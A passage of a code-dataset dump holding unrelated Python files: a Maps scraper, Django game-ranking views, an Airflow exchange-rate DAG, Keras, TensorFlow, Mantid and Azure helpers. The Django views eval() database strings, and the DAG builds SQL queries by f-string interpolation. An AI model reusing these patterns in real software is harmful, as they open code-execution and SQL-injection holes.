Fall\"]\n\nids = []\nfor city in cities:\n\tresults = []\n\t# Geocoding an address\n\tgeocode_result = gmaps.geocode(city)\n\tloc = geocode_result[0]['geometry']['location']\n\tquery_result = gmaps.places_nearby(keyword=\"寵物\",location=loc, radius=10000)\n\tresults.extend(query_result['results'])\n\n\twhile query_result.get('next_page_token'):\n\t\ttime.sleep(2)\n\t\tquery_result = gmaps.places_nearby(page_token=query_result['next_page_token'])\n\t\tresults.extend(query_result['results']) \n\tprint(\"找到以\"+city+\"為中心半徑10000公尺的寵物店家數量(google mapi api上限提供60間): \"+str(len(results)))\n\n\tfor place in results:\n\t\tids.append(place['place_id'])\n\n\nstores_info = []\n# 去除重複id\nids = list(set(ids)) \nfor id in ids:\n\tstores_info.append(gmaps.place(place_id=id, language='en')['result'])\n\noutput = pd.DataFrame.from_dict(stores_info)\nprint(output)\n\ndf = pd.DataFrame(output)\ndf.to_csv(\"test_data1.csv\")","sub_path":"Google API/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"330128116","text":"import json\nimport copy\n\nfrom django.views import View\nfrom django.http import (\n JsonResponse,\n HttpResponse\n)\n\nfrom .models import (\n GameUser,\n Comment,\n Detail,\n UserPageHit,\n UserTrackInfo,\n UserTrackRecord,\n TeamType,\n Ranking\n)\nfrom metadata.models import Track\nfrom user.utils import login_decorator\n\ndef milisec_converter(mili_sec):\n minute = float(int(mili_sec)/60000)\n second = str(round((float(format(minute, '.4f')) - (int(mili_sec)//60000)) * 60, 2)).replace('.','\\'')\n lap_time = str(int(mili_sec)//60000) + '\\'' + second\n return lap_time\n\n\nclass CommentView(View):\n def get(self, request, user_id):\n try:\n if GameUser.objects.filter(access_id=user_id).exists():\n user = GameUser.objects.get(access_id=user_id)\n comments = Comment.objects.filter(to_id=user).values()\n\n return JsonResponse({'comment' : list(comments)}, status=200)\n\n return JsonResponse({'Message' : 'INVALID_USER'}, status=400)\n\n except KeyError:\n return JsonResponse({'Message' : 'INVALID_KEYS'}, status=400)\n\n @login_decorator\n def post(self, request, user_id):\n try:\n data = json.loads(request.body)\n from_user = request.userinfo.game_user\n to_user = GameUser.objects.get(access_id=user_id)\n\n Comment(\n comment = data['comment'],\n from_id = from_user,\n to_id = to_user\n ).save()\n\n return HttpResponse(status=200)\n\n except KeyError:\n return JsonResponse({'Message' : 'INVALID_KEYS'}, status=400)\n\nclass RankDetailView(View):\n def get(self, request, access_id):\n try:\n gameuser = GameUser.objects.get(access_id=access_id)\n if UserPageHit.objects.filter(game_user=gameuser).exists():\n countview = UserPageHit.objects.get(game_user=gameuser)\n countview.count += 1\n countview.save()\n else:\n UserPageHit.objects.create(\n count=1,\n game_user=gameuser\n )\n\n gameuser = GameUser.objects.select_related('userpagehit', 'detail').get(access_id=access_id)\n detail = gameuser.detail\n pageview = gameuser.userpagehit\n\n win_ratio = round(detail.win_cnt / detail.play_cnt, 2)\n\n rank_list_50 = eval(detail.rank_list_50)\n for index, i in enumerate(rank_list_50):\n if i == 99.0:\n rank_list_50[index] = 8.0\n\n return JsonResponse({\n 'character' : {\n 'id' : detail.character.id,\n 'name' : detail.character.name,\n 'key' : detail.character.key,\n 'img' : detail.character.url,\n 'nickname' : gameuser.nickname,\n },\n 'pageview' : pageview.count,\n 'win_ratio' : win_ratio,\n 'retire_ratio' : float(detail.retire_pct),\n 'rank_avg_500' : float(detail.rank_avg_500),\n 'rank_avg_50' : float(detail.rank_avg_50),\n 'rank_list_50' : rank_list_50\n }, status=200)\n\n except KeyError:\n return JsonResponse({'Message' : 'INVALID_KEYS'}, status=400)\n\n except GameUser.DoesNotExist:\n return HttpResponse(status=400)\n\nclass IndiDetailTrackView(View):\n def get(self, request, access_id):\n access_id = GameUser.objects.get(access_id = access_id)\n match_type = TeamType.objects.get(name = '개인전')\n track_records = UserTrackRecord.objects.filter(\n game_user=access_id).all()\n track_infos = UserTrackInfo.objects.filter(\n game_user_id=access_id, team_type=match_type).all()\n records_exists = [i.track for i in track_records]\n info_exists_in_records = [i for i in track_infos if i.track in records_exists]\n track_info_result = [\n {\n 'play_cnt': i.play_cnt,\n 'win_ratio': float(i.win_ratio),\n 'best_lap': i.best_lap,\n 'track_name': i.track.name,\n 'track_key': Track.objects.get(name=i.track).key\n }\n for i in info_exists_in_records]\n return JsonResponse({\"information\": track_info_result}, status=200)\n\nclass TeamDetailTrackView(View):\n def get(self, request, access_id):\n access_id = GameUser.objects.get(access_id = access_id)\n match_type = TeamType.objects.get(name = '팀전')\n track_records = UserTrackRecord.objects.filter(\n game_user=access_id).all()\n track_infos = UserTrackInfo.objects.filter(\n game_user_id=access_id, team_type=match_type).all()\n records_exists = [i.track for i in track_records]\n info_exists_in_records = [i for i in track_infos if i.track in records_exists]\n track_info_result = [\n {\n 'play_cnt': i.play_cnt,\n 'win_ratio': float(i.win_ratio),\n 'best_lap': i.best_lap,\n 'track_name': i.track.name,\n 'track_key': Track.objects.get(name=i.track).key\n }\n for i in info_exists_in_records]\n return JsonResponse({\"information\": track_info_result}, status=200)\n\nclass IndiDetailTrackDist(View):\n def get(self, request, access_id, track_key):\n access_id = GameUser.objects.get(access_id = access_id)\n match_type = TeamType.objects.get(name = '개인전')\n track = Track.objects.get(key = track_key)\n track_record = UserTrackRecord.objects.get(\n game_user = access_id, team_type = match_type, track = track)\n track_record2 = copy.deepcopy(track_record)\n track_record3 = {str(milisec_converter(i)):j for i,j in eval(track_record2.cumul_dist)[1].items()}\n track_record4 = [str(milisec_converter(eval(track_record2.cumul_dist)[0])), track_record3]\n track_record_result = [\n {\n 'track_distribution': eval(track_record.cumul_dist),\n 'track_distribution2' : track_record4,\n 'track_name': track_record.track.name,\n 'track_key': Track.objects.get(name=track_record.track.name).key\n }\n ]\n return JsonResponse({\"information\": track_record_result}, status=200)\n\nclass TeamDetailTrackDist(View):\n def get(self, request, access_id, track_key):\n access_id = GameUser.objects.get(access_id = access_id)\n match_type = TeamType.objects.get(name = '팀전')\n track = Track.objects.get(key = track_key)\n track_record = UserTrackRecord.objects.get(\n game_user = access_id, team_type = match_type, track = track)\n track_record2 = copy.deepcopy(track_record)\n track_record3 = {str(milisec_converter(i)):j for i,j in eval(track_record2.cumul_dist)[1].items()}\n track_record4 = [str(milisec_converter(eval(track_record2.cumul_dist)[0])), track_record3]\n track_record_result = [\n {\n 'track_distribution': eval(track_record.cumul_dist),\n 'track_distribution2' : track_record4,\n 'track_name': track_record.track.name,\n 'track_key': Track.objects.get(name=track_record.track.name).key\n }\n ]\n return JsonResponse({\"information\": track_record_result}, status=200)\n\nclass IndiRankListView(View):\n def get(self, request):\n\n indi_match_id = \"7b9f0fd5377c38514dbb78ebe63ac6c3b81009d5a31dd569d1cff8f005aa881a\"\n team_id = 1\n\n rank_list = Ranking.objects.prefetch_related('game_user_set').filter(team_type_id=team_id).values()\n rank_list = list(rank_list)\n\n for i in range(len(rank_list)):\n rank_list[i]['nickname'] = GameUser.objects.get(id=i+1).nickname\n rank_list[i]['access_id'] = GameUser.objects.get(id=i+1).access_id\n rank_list[i]['matchType'] = indi_match_id\n\n return JsonResponse({\"indi_rank_list\" : rank_list}, status = 200)\n\nclass TeamRankListView(View):\n def get(self, request):\n\n team_match_id = \"effd66758144a29868663aa50e85d3d95c5bc0147d7fdb9802691c2087f3416e\"\n team_id = 2\n\n rank_list = Ranking.objects.prefetch_related('game_user_set').filter(team_type_id=team_id).values()\n rank_list = list(rank_list)\n\n for i in range(len(rank_list)):\n rank_list[i]['nickname'] = GameUser.objects.get(id=i+1).nickname\n rank_list[i]['access_id'] = GameUser.objects.get(id=i+1).access_id\n rank_list[i]['matchType'] = team_match_id\n\n return JsonResponse({\"team_rank_list\" : rank_list}, status = 200)\n","sub_path":"rank/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"571203943","text":"# 导入模块\nimport xlwings as xw\n\n# 1 新增工作表\ndef add_sheet():\n app = xw.App(visible=True, add_book=False)\n # 2 打开原工作簿\n workbook = app.books.open(\"../source_material/01/合并工作表.xlsx\")\n # 3 新增工作表\n workbook.sheets.add(\"合并工作表\")\n\n return workbook\n\n# 2 获取每个表中的最后的位置信息\ndef get_sheet_value(workbook):\n # 获取所有工作表\n listsht = workbook.sheets\n # 创建一个空列表,放置每个表的最后位置信息\n list_address = []\n for sheet in listsht:\n if sheet.name != \"合并工作表\":\n address_all = sheet.used_range.address.split(\"$\")[-1]\n list_address.append(int(address_all))\n\n return list_address\n\n# 3 根据位置,将数值放进合并的表格中\ndef set_merge_sheet(workbook, address):\n # 先写第一行数据\n workbook.sheets[\"合并工作表\"].range(\"A1:E1\").value = workbook.sheets[1].range(\"A1:E1\").value\n\n\n# 4 python程序执行入口\nif __name__ == \"__main__\":\n # 1 新增工作表\n obj_workbook = add_sheet()\n # 2 获取每个表中的最后的位置信息\n list_address = get_sheet_value(obj_workbook)\n # 3 根据位置,将数值放进合并的表格中\n set_merge_sheet(obj_workbook, list_address)\n\n\n\n","sub_path":"Python_Office_Automation/04-实战应用案例分析/01-应用案例:合并工作表/05-设置合并工作表的第一行数据.py","file_name":"05-设置合并工作表的第一行数据.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"158197797","text":"from datetime import datetime, timedelta\nimport os\nimport requests\nimport logging\n\nfrom airflow import DAG\nfrom airflow.operators.postgres_operator import PostgresOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.hooks.base_hook import BaseHook\nfrom airflow.models import Variable\n\nimport pandas as pd\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.engine.base import Engine\n\nfrom shared import make_engine\n\nlogger = logging.getLogger('airflow.task')\nlogger.info('Exchange Rates information...')\n\ndefault_args = {\n 'owner': 'airflow',\n 'start_date': datetime(2021, 10, 14),\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n 'depends_on_past': False,\n 'email_on_failure': True,\n 'email_on_retry': False,\n 'email': 'vincent.farah@madetech.com'\n}\nex_rates_data_path = f'{Variable.get(\"data_path\")}/exchange-rates.csv'\ntransformed_ex_rates_path = f'{os.path.splitext(ex_rates_data_path)[0]}-transformed.csv'\n\ndef transform_ex_rates_data(*args, **kwargs):\n ex_rates_data = pd.read_csv(filepath_or_buffer=ex_rates_data_path,\n sep=',',\n header=0,\n usecols=['code','rate','base_rate_code','date'],\n parse_dates=['date'],\n index_col=0\n )\n ex_rates_data.to_csv(path_or_buf=transformed_ex_rates_path)\n\ndef load_csv_ex_rates_to_db(*args, **kwargs): \n transformed_ex_rates = pd.read_csv(transformed_ex_rates_path)\n transformed_ex_rates.dropna(axis=0, how='any', inplace=True)\n engine = make_engine()\n transformed_ex_rates.to_sql('ex_rates',engine,if_exists='replace',chunksize=500,index=False)\n\ndef get_ex_rates_from_api():\n url = Variable.get('exchange_url')\n logger.info(f'Loading data from {url}')\n response = requests.get(url)\n logger.info(response)\n json_response = response.json() \n logger.info(json_response)\n return json_response\n\ndef store_latest_ex_rates_from_api_to_db():\n rates_data = get_ex_rates_from_api()\n date = rates_data['date']\n logger.info('Date', date)\n base_rate_code = rates_data['base']\n logger.info('Base Code', base_rate_code)\n rates = rates_data['rates']\n logger.info(rates)\n engine = make_engine() \n delete_rates_by_date(date, engine)\n add_exchange_rates(date, base_rate_code, rates, engine)\n\ndef add_exchange_rates(date, base_rate_code, rates, engine):\n if rates:\n usd_base_rate = rates['USD']\n gbp_base_rate = rates['GBP']\n for code, rate in rates.items(): \n add_exchange_rate(date, base_rate_code, engine, code, rate)\n if usd_base_rate:\n add_exchange_rate(date, 'USD', engine, code, rate/usd_base_rate)\n if gbp_base_rate:\n add_exchange_rate(date, 'GBP', engine, code, rate/gbp_base_rate)\n\ndef add_exchange_rate(date, base_rate_code, engine, code, rate):\n logger.info(f'{code}, {rate}, {base_rate_code}, {date}') \n # TODO: Refactor using the ORM \n insert_response = engine.execute(\n f'''\n INSERT INTO ex_rates(code,rate,base_rate_code,date) \n VALUES ('{code}',{rate},'{base_rate_code}','{date}');\n '''\n )\n logger.info(f'Created \"{insert_response.rowcount}\" records')\n\ndef delete_rates_by_date(date, engine):\n if date:\n # TODO: Refactor using the ORM\n delete_response = engine.execute(f\"DELETE FROM ex_rates WHERE date = '{date}'\")\n logger.info(f'Deleted \"{delete_response}\" records')\n \nwith DAG(dag_id='exchange_rates_dag',\n schedule_interval='@daily',\n default_args=default_args,\n template_searchpath=[f\"{os.environ['AIRFLOW_HOME']}\"],\n catchup=False) as dag:\n \n # TODO: Refactor using ORM\n create_table_ex_rates_if_not_exists = PostgresOperator(\n task_id='create_table_ex_rates_if_not_exists',\n sql='''CREATE TABLE IF NOT EXISTS ex_rates (\n code VARCHAR(3) NOT NULL,\n rate DECIMAL NOT NULL,\n base_rate_code VARCHAR(3) NOT NULL,\n date DATE NOT NULL,\n CONSTRAINT pk_ex_rates PRIMARY KEY (code, base_rate_code, date)\n );''',\n postgres_conn_id='postgres',\n database='exercise1'\n )\n\n transform_ex_rates_data = PythonOperator(\n task_id='transform_ex_rates_data',\n python_callable=transform_ex_rates_data\n )\n\n save_csv_ex_rates_to_db = PythonOperator(\n task_id='save_csv_ex_rates_to_db',\n python_callable=load_csv_ex_rates_to_db\n )\n\n save_latest_ex_rates_from_api_to_db = PythonOperator(\n task_id='save_latest_ex_rates_from_api_to_db',\n python_callable=store_latest_ex_rates_from_api_to_db\n )\n\n transform_ex_rates_data >> create_table_ex_rates_if_not_exists >> save_csv_ex_rates_to_db\n create_table_ex_rates_if_not_exists >> save_latest_ex_rates_from_api_to_db\n","sub_path":"Exercise1/dags/exchange_rates_dag.py","file_name":"exchange_rates_dag.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"13783880","text":"#!/usr/local/bin/python\n# encoding:utf-8\n# =====================================================\n# this part set in pycharm template\n# created by Chen Xu\n# email: chenxu@mail.ustc.edu.cn\n# copyright cx\n# Darwin Kernel Version 16.5.0: Fri Mar 3 16:52:33 PST 2017; root:xnu-3789.51.2~3/RELEASE_X86_64\n# =====================================================\n# same as p22_mlp but not use l2_loss\n\nfrom keras.models import Sequential, load_model\nfrom keras import optimizers, losses, metrics\nfrom keras.layers import Dense, Dropout\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import TensorBoard\nfrom keras.utils import plot_model, to_categorical\n\nnp.set_printoptions(precision=4)\nnpTypeUsed = np.float32\ninDataAll = np.load('mlpHiggs2.d.npy')\nused_structure = ['ptsumf', 'msumf', 'acolin', 'minvis']\nx_d = inDataAll[used_structure].tolist()\nx_d_test = np.asarray(x_d[::2], dtype=npTypeUsed)\nx_d_train = np.asarray(x_d[1::2], dtype=npTypeUsed)\n\ny_d = inDataAll[['type']].tolist()\ny_d_test = np.asarray(y_d[::2], dtype=npTypeUsed)\ny_d_train = np.asarray(y_d[1::2], dtype=npTypeUsed)\ny_d_test = to_categorical(y_d_test, num_classes=2)\ny_d_train = to_categorical(y_d_train, num_classes=2)\n\nn_o: int = 2\nn_i: int = len(used_structure) # input\nn_h: list = [n_i, 5, 3, n_o]\ni_l_out: int = len(n_h) - 1\nkeepProb: float = 1.0\n\nmodelfile: str = 'sav/keras.d.h5'\nif os.path.isfile(modelfile):\n print('load exit model', modelfile)\n model = load_model(modelfile)\nelse:\n print('new training')\n model = Sequential()\n model.add(Dense(n_h[1], activation='relu', input_shape=(n_i,)))\n# model.add(Dropout(rate=(1.0-keepProb)))\n for i in range(i_l_out-2):\n model.add(Dense(n_h[i+2], activation='relu'))\n# model.add(Dropout(rate=(1.0-keepProb)))\n model.add(Dense(n_o, activation='softmax', use_bias=True))\n adamOp = optimizers.Adam(lr=0.001)\n model.compile(loss=losses.categorical_crossentropy, optimizer=adamOp,\n # metrics=[metrics.categorical_accuracy, metrics.categorical_crossentropy])\n metrics=[metrics.categorical_accuracy])\n\ntensorboard = TensorBoard(log_dir='./log', batch_size=2000, histogram_freq=1, write_graph=True)\nhistory = model.fit(x_d_train, y_d_train, batch_size=2000, epochs=30, verbose=1,\n validation_data=(x_d_test, y_d_test), callbacks=[tensorboard])\n\nmodel.save(modelfile)\n# model.summary()\nplot_model(model, to_file='model.png', show_shapes=True)\n\nouttype = [('y_p0', npTypeUsed), ('y_p1', npTypeUsed), ('y0', npTypeUsed), ('y1', npTypeUsed)]\ny_p = model.predict(x_d_train)\noutall = (np.concatenate((y_p, y_d_train.astype(npTypeUsed)), axis=1)).view(dtype=outtype)\nnp.save(\"mlpout.d\", outall)\ny_p = model.predict(x_d_test)\noutall2 = (np.concatenate((y_p, y_d_test.astype(npTypeUsed)), axis=1)).view(dtype=outtype)\n\n\nplt.figure(1)\nplt1 = plt.subplot(221)\nplt1.set_yscale(\"log\")\nplt1.hist((outall[outall['y0'] < 0.1]['y_p0'], outall[outall['y0'] > 0.9]['y_p0']), bins=30, range=[-0.1, 1.1])\nplt2 = plt.subplot(222)\nplt2.set_yscale(\"log\")\nplt2.hist((outall[outall['y1'] < 0.1]['y_p1'], outall[outall['y1'] > 0.9]['y_p1']), bins=30, range=[-0.1, 1.1])\nplt3 = plt.subplot(223)\nplt3.set_yscale(\"log\")\nplt3.hist((outall2[outall2['y0'] < 0.1]['y_p0'], outall2[outall2['y0'] > 0.9]['y_p0']), bins=30, range=[-0.1, 1.1])\nplt4 = plt.subplot(224)\nplt4.set_yscale(\"log\")\nplt4.hist((outall2[outall2['y1'] < 0.1]['y_p1'], outall2[outall2['y1'] > 0.9]['y_p1']), bins=30, range=[-0.1, 1.1])\nplt.show()\n","sub_path":"p22_mlp.py","file_name":"p22_mlp.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"154542869","text":"from django.conf.urls import url\n\n\nurlpatterns = [\n url(r'^$', 'alarm.views.list', name='alarm-list'),\n url(r'^new/$', 'alarm.views.new', name='alarm-new'),\n url(r'^(?P[\\w\\s-]+)/remove/$', 'alarm.views.remove', name='alarm-remove'),\n url(r'^(?P[\\w\\s-]+)/event/$', 'event.views.list', name='event-list'),\n url(r'^(?P[\\w\\s-]+)/$', 'alarm.views.get', name='alarm-get'),\n]\n","sub_path":"alarm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"433502594","text":"import requests\nimport json\nimport os \nfrom dotenv import load_dotenv\n\nload_dotenv()\nsearch_elastic = os.getenv(\"search_elastic\")\nsample_search_elastic = os.getenv(\"sample_search_elastic\") \n\ndef buildScript(labels):\n script_list = []\n for i in labels:\n script_list.append(\"Math.pow((params.{} - doc['labels.{}'].value),2)\".format(i,i))\n return str(\"1 / ({})\".format(\"+\".join(script_list)))\n\n\ndef builRequestBody():\n pass\n return None\n\ndef getElasticResultByLabels(labels):\n\n headers = {\n \"content-type\": \"application/json\",\n }\n\n body_script = buildScript(labels)\n body = json.dumps(\n {\n \"query\" : {\n \"function_score\" : {\n \"script_score\" : {\n \"script\" : {\n \"params\": labels,\n \"source\": body_script\n }\n }\n }\n }\n }\n )\n\n print(body)\n\n result = None\n try:\n # DO THE POST REQUEST\n result = requests.post(\n search_elastic,\n data=body,\n headers=headers,\n verify=False\n ).json()\n\n except Exception as e:\n print(e)\n\n print(result)\n return result['hits']['hits']\n\n\ndef getRandomImage():\n headers = {\n \"content-type\": \"application/json\",\n }\n\n body = json.dumps({\n \"size\": 9,\n \"query\": {\n \"function_score\": {\n \"functions\": [{\n \"random_score\": {\n \"seed\": \"1501159265\"\n }\n }]\n }\n }\n })\n\n result = None\n try:\n # DO THE POST REQUEST\n result = requests.post(\n search_elastic,\n data=body,\n headers=headers,\n verify=False\n ).json()\n\n except Exception as e:\n print(e)\n\n return result['hits']['hits']\n\n\ndef getElasticResultByName(name):\n search_query = \"{sample_search_elastic}?q=place_name:{name}\".format(sample_search_elastic=sample_search_elastic, name=name)\n result = None\n try:\n result = requests.get(\n search_query\n ).json()\n\n except Exception as e:\n print(e)\n\n return result['hits']['hits']\n\ndef getElasticResultByText(text):\n search_query = \"{search_elastic}?q={text}\".format(search_elastic=search_elastic, text=text)\n result = None\n try:\n result = requests.get(\n search_query\n ).json()\n\n except Exception as e:\n print(e)\n\n return result['hits']['hits']\n","sub_path":"elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"488401994","text":"from datetime import datetime\nfrom django.test import TestCase\n\nfrom eventex.subscriptions.models import Subscription\n\n\nclass SubscriptionModelTest(TestCase):\n\n def setUp(self):\n self.obj = Subscription(\n name='Ana',\n cpf='12345678910',\n email='email@email.com',\n phone='(00) 90000-0000'\n )\n self.obj.save()\n\n def test_create(self):\n self.assertTrue(Subscription.objects.exists())\n\n def test_created_at(self):\n self.assertIsInstance(self.obj.created_at, datetime)\n","sub_path":"eventex/subscriptions/tests/test_model_subscription.py","file_name":"test_model_subscription.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"244057637","text":"import os\nos.environ['KMP_DUPLICATE_LIB_OK']='True'\nimport urllib.request\nimport argparse\nimport sys\nimport alexnet\n#from alexnet import *\nimport cv2\nimport tensorflow as tf\nimport numpy as np\nimport caffe_classes\n#from caffe_classes import *\n\n#인자로 넘어온 것 파싱하기\n#folder인지 url인지 확인하고 default는 folder이다.\nparser = argparse.ArgumentParser(description='Classify some images.')\nparser.add_argument('-m', '--mode', choices = ['folder', 'url'], default='folder')\nparser.add_argument('-p', '--path', help='Specify a path [e.g. testModel]', default = 'testModel')\n\n#args = Args()\nargs = parser.parse_args(sys.argv[1:])\n\n#folder이면\nif args.mode == 'folder':\n #get testImage\n withPath = lambda f: '{}/{}'.format(args.path,f)\n testImg = dict((f,cv2.imread(withPath(f))) for f in os.listdir(args.path) if os.path.isfile(withPath(f)))\nelif args.mode == 'url':\n\tdef url2img(url):\n\t\t#url to image\n\t\tresp = urllib.request.urlopen(url)\n\t\t#url을 이미지로 바꾼다.\n\t\timage = np.asarray(bytearray(resp.read()), dtype=\"uint8\")\n\t\timage = cv2.imdecode(image, cv2.IMREAD_COLOR)\n\t\treturn image\n\ttestImg = {args.path:url2img(args.path)}\n\nif testImg.values():\n\t#some params\n\tdropoutPro = 1\n\tclassNum = 1000\n\tskip = []\n\n\t#placeholder : 다른 텐서를 placeholder에 맵핑시킨다.\n\timgMean = np.array([104, 117, 124], np.float)\n\tx = tf.placeholder(\"float\", [1, 227, 227, 3])\n\n\t#alexNet 실행\n\tmodel = alexnet.alexNet(x, dropoutPro, classNum, skip)\n\tscore = model.fc3\n\tsoftmax = tf.nn.softmax(score)\n\n\t#학습 시작\n\twith tf.Session() as sess:\n\t\tsess.run(tf.global_variables_initializer())\n\t\tmodel.loadModel(sess)\n\n\t\t#testImg에서 item을 하나씩 뽑아 분석한다.\n\t\tfor key,img in testImg.items():\n #img preprocess\n\t\t\tresized = cv2.resize(img.astype(np.float), (227, 227)) - imgMean\n\t\t\tmaxx = np.argmax(sess.run(softmax, feed_dict = {x: resized.reshape((1, 227, 227, 3))}))\n\t\t\t#caffe_classes에서 maxx값에 따른 이름을 저장한다.\n\t\t\tres = caffe_classes.class_names[maxx]\n\n\t\t\tfont = cv2.FONT_HERSHEY_SIMPLEX\n\t\t\t#어떤 종률인지 화면에 텍스트로 뿌린다.\n\t\t\tcv2.putText(img, res, (int(img.shape[0]/3), int(img.shape[1]/3)), font, 1, (0, 255, 0), 2)\n\t\t\tprint(\"{}: {}\\n----\".format(key,res))\n\t\t\tcv2.imshow(\"demo\", img)\n\t\t\tcv2.waitKey(0)","sub_path":"testModel.py","file_name":"testModel.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"242474345","text":"from mantid.simpleapi import *\nimport os\nimport string\n\ndef find_file(run_number):\n \"\"\"Use Mantid to search for the given run.\n \"\"\" \n file_hint = str(run_number)\n try:\n return FileFinder.findRuns(file_hint)[0]\n except RuntimeError:\n message = 'Cannot find file matching hint \"%s\" on current search paths ' + \\\n 'for instrument \"%s\"'\n raise ValueError( message % (file_hint, config['default.instrument']))\n\ndef create_resultname(run_number, prefix='', suffix=''):\n \"\"\"Create a string based on the run number and optional prefix and \n suffix. \n \"\"\"\n if type(run_number) == list:\n name = create_resultname(run_number[0], prefix, suffix)\n elif type(run_number) == int:\n name = prefix + str(run_number) + '.spe' + suffix\n else:\n name = os.path.basename(str(run_number))\n # Hack any instrument name off the front so the output is the same as if you give it a run number\n name = name.lstrip(string.ascii_letters)\n if (suffix is None):\n name = os.path.splitext(name)[0] + '.spe'\n else:\n name = os.path.splitext(name)[0] + '.spe' + suffix\n\n return name\n \ndef create_dataname(input):\n \"\"\"This assumes some kind of filename input and creates a workspace\n from the basename of the full file path\n \"\"\"\n return os.path.basename(input)\n\n# Keeps track of loaded data files so that they can be clean up easily\n_loaded_data = []\n\ndef clear_loaded_data():\n \"\"\"Clears any previously loaded data workspaces\n \"\"\"\n global _last_mono_file, _loaded_data\n _last_mono_file = None\n for data_ws in _loaded_data:\n mtd.deleteWorkspace(data_ws)\n _loaded_data = []\n \ndef is_loaded(filename):\n \"\"\"Returns True if the file is already loaded, false otherwise\n \"\"\"\n global _loaded_files\n data_name = create_dataname(filename)\n if data_name in _loaded_files:\n return True\n else:\n return False\n \ndef mark_as_loaded(filename):\n \"\"\"Mark a file as loaded.\n \"\"\"\n global _loaded_data\n data_name = create_dataname(filename)\n if data_name not in _loaded_data:\n logger.notice(\"Marking %s as loaded.\" % filename)\n _loaded_data.append(data_name)\n\ndef load_runs(runs, sum=True):\n \"\"\"\n Loads a list of files, summing if the required. \n \"\"\"\n if type(runs) == list:\n if len(runs) == 1:\n sum = False\n if sum == True:\n if len(runs) == 0: raise RuntimeError(\"load_runs was supplied an empty list.\")\n result_ws = load_run(runs[0])\n summed = 'summed-run-files'\n CloneWorkspace(InputWorkspace=result_ws,OutputWorkspace=summed)\n sum_files(summed, runs[1:])\n result_ws = mtd[summed]\n mark_as_loaded(summed)\n return result_ws\n else:\n loaded = []\n for r in runs:\n loaded.append(load_run(r))\n if len(loaded) == 1:\n return loaded[0]\n else:\n return loaded\n else:\n # Try a single run\n return load_run(runs)\n\ndef load_run(run_number, force=False):\n \"\"\"Loads run into the given workspace. \n \n The AddSampleLog algorithm is used to add a Filename property\n to the resulting workspace so that it can be retrieved later\n in the reduction chain\n\n If force is true then the file is loaded regardless of whether\n its workspace exists already.\n \"\"\"\n # If a workspace with this name exists, then assume it is to be used in place of a file\n if str(run_number) in mtd:\n logger.notice(\"%s already loaded as workspace.\" % str(run_number))\n if type(run_number) == str: return mtd[run_number]\n else: return run_number\n\n # If it doesn't exists as a workspace assume we have to try and load a file\n if type(run_number) == int: \n filename = find_file(run_number)\n elif type(run_number) == list:\n raise TypeError('load_run() cannot handle run lists')\n else:\n # Check if it exists, else tell Mantid to try and \n # find it\n if os.path.exists(run_number):\n filename = run_number\n else:\n filename = find_file(run_number)\n \n # The output name \n output_name = create_dataname(filename)\n if (not force) and (output_name in mtd):\n logger.notice(\"%s already loaded\" % filename)\n return mtd[output_name]\n\n ext = os.path.splitext(filename)[1]\n if filename.endswith(\"_event.nxs\"):\n LoadEventNexus(Filename=filename, OutputWorkspace=output_name) \n elif ext.startswith(\".n\"):\n LoadNexus(Filename=filename,OutputWorkspace=output_name)\n elif filename.endswith(\"_event.dat\"):\n #load the events\n LoadEventPreNexus(EventFilename=filename, OutputWorkspace=output_name) \n else:\n LoadRaw(Filename=filename,OutputWorkspace=output_name)\n #LoadDetectorInfo(output_name, filename)\n\n # Attach the filename to the workspace so that it can be retrieved later in the reduction chain\n AddSampleLog(Workspace=output_name,LogName=\"Filename\",LogText=filename)\n logger.notice(\"Loaded %s\" % filename)\n return mtd[output_name]\n\ndef sum_files(accumulator, files, file_type):\n \"\"\"\n Sum a current workspace and a list of files, accumulating the results in the\n given workspace\n \"\"\"\n if type(files) == list:\n for filename in files:\n temp = load_run(filename, file_type)\n Plus(LHSWorkspace=accumulator,RHSWorkspace=temp,OutputWorkspace=accumulator)\n else:\n pass\n","sub_path":"Code/Mantid/scripts/Inelastic/CommonFunctions.py","file_name":"CommonFunctions.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"40980915","text":"# coding: utf-8\r\n# -------------------------------------------------------------------------\r\n# Desenvolvido a partir do modelo oficial Microsoft blob for PY\r\n# -------------------------------------------------------------------------\r\n# LIB azure-storage-blob neceaario - use pip install azure-storage-blob\r\n\r\n# Importacao de dependencias\r\nfrom azure.storage.blob import BlockBlobService, ContentSettings, AppendBlobService\r\nimport os\r\n\r\n\r\ndef criaContainerAzure(account, key, containerName):\r\n # Esse metodo verificar cria um container somente apos testar se o mesmo ja existe\r\n\r\n blobService = BlockBlobService(account, key)\r\n\r\n if blobService.exists(containerName):\r\n return \"O container ja existe, impossivel de criar itens duplicados.\"\r\n\r\n else:\r\n\r\n blobService.create_container(containerName)\r\n\r\n return \"Container criado com sucesso.\"\r\n\r\ndef deletaContainerAzure(account, key, containerName):\r\n # Esse metodo deleta um 